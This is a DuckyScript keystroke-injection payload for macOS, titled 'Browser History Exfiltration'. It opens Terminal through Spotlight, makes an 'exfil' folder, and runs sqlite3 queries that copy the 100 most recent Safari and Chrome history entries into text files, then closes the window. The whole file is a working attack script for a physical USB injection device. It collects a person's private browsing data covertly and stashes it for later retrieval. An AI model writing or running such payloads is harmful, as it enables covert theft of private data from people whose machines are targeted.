REM Author: Generated
REM Title: Browser History Exfiltration
REM Target: macOS
REM Version: 1.0
REM Category: Exfiltration
REM ---
DELAY 1000
REM Export browser history from Safari and Chrome
REM Saves to ~/Documents/exfil/browser_history/
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil/browser_history
ENTER
DELAY 500
STRING sqlite3 ~/Library/Safari/History.db "SELECT visit_time, title, url FROM history_items JOIN history_visits ON history_items.id = history_visits.history_item_id ORDER BY visit_time DESC LIMIT 100;" > ~/Documents/exfil/browser_history/safari_history.txt 2>/dev/null
ENTER
DELAY 500
STRING sqlite3 ~/Library/Application\ Support/Google/Chrome/Default/History "SELECT last_visit_time, title, url FROM urls ORDER BY last_visit_time DESC LIMIT 100;" > ~/Documents/exfil/browser_history/chrome_history.txt 2>/dev/null
ENTER
DELAY 1000
STRING ls -la ~/Documents/exfil/browser_history/
ENTER
DELAY 500
GUI w
